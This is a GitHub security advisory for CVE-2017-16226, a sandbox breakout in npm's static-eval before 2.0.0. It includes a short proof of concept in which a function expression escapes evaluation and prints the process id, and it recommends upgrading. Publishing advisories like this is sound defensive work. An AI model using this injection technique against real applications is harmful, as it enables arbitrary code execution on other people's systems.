Skip to content

Sandbox Breakout / Arbitrary Code Execution in static-eval

Moderate severity GitHub Reviewed Published Aug 6, 2018 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm static-eval (npm)

Affected versions

< 2.0.0

Patched versions

2.0.0

Description

Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.

References

Published to the GitHub Advisory Database Aug 6, 2018
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Moderate

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(79th percentile)

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

CVE ID

CVE-2017-16226

GHSA ID

GHSA-5mjw-6jrh-hvfq

Source code

No known source code
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.